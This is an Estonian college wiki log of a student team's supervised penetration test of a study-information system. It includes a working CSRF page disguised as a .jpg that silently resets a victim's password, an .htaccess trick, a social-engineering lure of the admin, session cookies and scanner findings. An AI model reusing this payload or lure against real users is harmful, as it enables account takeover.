Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:Insecure_Cryptographic_Storage.pdf&amp;diff=47044</id>
		<title>File:Insecure Cryptographic Storage.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:Insecure_Cryptographic_Storage.pdf&amp;diff=47044"/>
		<updated>2012-03-30T13:41:51Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:Security_Misconfiguration.pdf&amp;diff=47043</id>
		<title>File:Security Misconfiguration.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:Security_Misconfiguration.pdf&amp;diff=47043"/>
		<updated>2012-03-30T13:41:37Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47034</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47034"/>
		<updated>2012-03-30T11:37:35Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
